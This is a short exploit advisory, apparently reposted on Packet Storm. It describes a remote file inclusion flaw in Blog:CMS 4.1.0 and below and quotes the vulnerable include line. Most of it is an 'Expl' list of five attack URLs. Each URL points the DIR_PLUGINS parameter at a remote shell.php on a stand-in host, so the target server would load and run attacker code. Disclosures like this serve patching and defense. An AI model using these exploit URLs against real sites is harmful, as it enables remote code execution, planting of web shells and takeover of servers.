Blog:CMS versions 4.1.0 and below suffer from a remote file inclusion flaw.
f548cb12dcabab82dcd48af1859f00f8bffe6f9b488c2fdd8bf62bf767423a3aBlog:Cms <= 4.1.0 Remote Inclusion File
Bug Found by Drago84 ToxiC CreW
Site Vendor :https://blogcms.com/
Page affetc:
index.php
media.php
archive.php
archives.php
blog.php
The Problem is:
include($DIR_PLUGINS."related/nusoap.php");
Expl:
https://www.sito.com/dir_blogccms/index.php?DIR_PLUGINS=https://evalsite.com/shell.php?
https://www.sito.com/dir_blogccms/admin/media.php?DIR_PLUGINS=https://evalsite.com/shell.php?
https://www.sito.com/dir_blogccms/extras/fancyurls/archive.php?DIR_PLUGINS=https://evalsite.com/shell.php?
https://www.sito.com/dir_blogccms/extras/fancyurls/archives.php?DIR_PLUGINS=https://evalsite.com/shell.php?
https://www.sito.com/dir_blogccms/extras/fancyurls/blog.php?DIR_PLUGINS=https://evalsite.com/shell.php?
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed